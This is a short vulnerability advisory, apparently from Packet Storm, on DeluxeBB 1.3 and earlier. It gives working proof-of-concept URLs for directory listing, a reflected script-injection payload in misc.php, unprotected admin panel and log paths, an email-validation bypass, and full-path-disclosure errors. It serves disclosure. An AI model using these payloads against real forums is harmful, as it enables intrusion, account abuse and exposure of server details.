DeluxeBB versions 1.3 and below suffer from cross site scripting, unprotected administrative panels, and disclosure vulnerabilities.
77d8b4283ae07441efc3b56b5823c28026880c849cb61e83991af5cd5054d520# Author: cp77fk4r | Empty0pagE[Shift+2]gmail.com<https://gmail.com>
# Vendor: https://www.deluxebb.com
#
#[Directory Listing]
https://server/templates/
https://server/images/
https://server/logs/
https://server/wysiwyg/
https://server/docs/
https://server/classes
https://server/lang
https://server/settings/
#
#
#[Cross Site Scripting]
https://server/misc.php?sub=memberlist&page=-111111111111111111%3Cscript%3Ealert(1)%3C/script%3E
#
#
#[Unprotected Admin Panel Files]
https://server/templates/deluxe/admincp/
https://server/templates/corporate/admincp/
https://server/templates/blue/admincp/
#
#
#[Unprotected Log Files]
https://server/logs/cp.php
#
#
#[Mail Registration Validation Bypass]
After the user registration procedure, Simply enter to the link:
https://server/misc.php?sub=valemail&valmem=[USER_ID]&valnum=cp77fk4r
you can get your [USER_ID] on the last page of Member-List section:
https://server/misc.php?sub=memberlist&page=[LAST_PAGE]
#
#
#
#[Full Path Disclosure]
https://server/misc.php?sub=memberlist&page=-11111111111111111
-you'll get an error like:
Fatal error: Maximum execution time of 30 seconds exceeded in [FULL_PATH]/tools.php on line [..]
or:
https://server/misc.php?sub=memberlist&page=-1.11111111111111E+FF
-you'll get an error like:
Fatal error: Allowed memory size of 68157440 bytes exhausted (tried to allocate 66584545 bytes) in [FULL_PATH]/tools.php on line [..]
#
#
#[E0F]
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed